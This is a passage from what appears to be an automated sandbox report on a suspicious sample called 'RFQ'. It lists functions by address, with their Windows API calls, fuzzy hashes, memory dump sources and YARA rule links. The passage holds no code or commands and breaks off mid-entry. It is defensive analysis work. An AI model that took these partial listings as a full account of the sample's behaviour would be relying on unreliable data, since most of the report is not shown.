                                                                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3257027151-0
                                                                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                          Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastselect
                                                                          • String ID:
                                                                          • API String ID: 215497628-0
                                                                          • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                          • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                          Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 0044443B
                                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                          Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00444633
                                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                          Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                          • String ID:
                                                                          • API String ID: 2354583917-0
                                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                          Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                          Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                          • String ID:
                                                                          • API String ID: 896007046-0
                                                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                          Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                          • GetFocus.USER32 ref: 00448ACF
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                          • String ID:
                                                                          • API String ID: 3429747543-0
                                                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                          Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 3300667738-0
                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                          Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                          • String ID: %lu$\VH
                                                                          • API String ID: 3164766367-2432546070
                                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                          Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 3850602802-3636473452
                                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                          Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                          • String ID:
                                                                          • API String ID: 3985565216-0
                                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                          Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0041F707
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _free.LIBCMT ref: 0041F71A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free_malloc
                                                                          • String ID: [B
                                                                          • API String ID: 1020059152-632041663
                                                                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                          Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                                                          • __getptd.LIBCMT ref: 00413DBD
                                                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                          • _free.LIBCMT ref: 00413E07
                                                                          • __dosmaperr.LIBCMT ref: 00413E12
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • String ID:
                                                                          • API String ID: 155776804-0
                                                                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                          Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
